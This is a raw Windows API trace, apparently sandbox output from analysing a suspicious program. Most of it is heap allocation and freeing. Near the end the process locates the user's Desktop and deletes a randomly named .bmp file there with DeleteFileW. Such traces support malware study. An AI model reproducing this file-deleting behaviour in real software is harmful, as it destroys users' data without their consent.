[0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0162.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0162.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.701] CloseHandle (hObject=0x170) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.705] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0162.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0162.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0162.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.710] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0162.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0162.711] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.711] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0162.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0162.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0162.713] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/bY-NIrDXo_nG.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp", lpFilePart=0x8bedfc*="bY-NIrDXo_nG.bmp") returned 0x36 [0162.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0162.713] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by-nirdxo_ng.bmp")) returned 0x20 [0162.713] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccf87650, ftCreationTime.dwHighDateTime=0x1d4cb04, ftLastAccessTime.dwLowDateTime=0x96e0c9e0, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0x96e0c9e0, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0xc6da, dwReserved0=0x2d, dwReserved1=0x4, cFileName="bY-NIrDXo_nG.bmp", cAlternateFileName="BY-NIR~1.BMP")) returned 0xaa56a0 [0162.713] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by-nirdxo_ng.bmp")) returned 1 [0162.715] FindNextFileW (in: hFindFile=0xaa56a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccf87650, ftCreationTime.dwHighDateTime=0x1d4cb04, ftLastAccessTime.dwLowDateTime=0x96e0c9e0, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0x96e0c9e0, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0xc6da, dwReserved0=0x2d, dwReserved1=0x4, cFileName="bY-NIrDXo_nG.bmp", cAlternateFileName="BY-NIR~1.BMP")) returned 0 [0162.716] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.716] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0162.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0162.716] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0162.717] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) 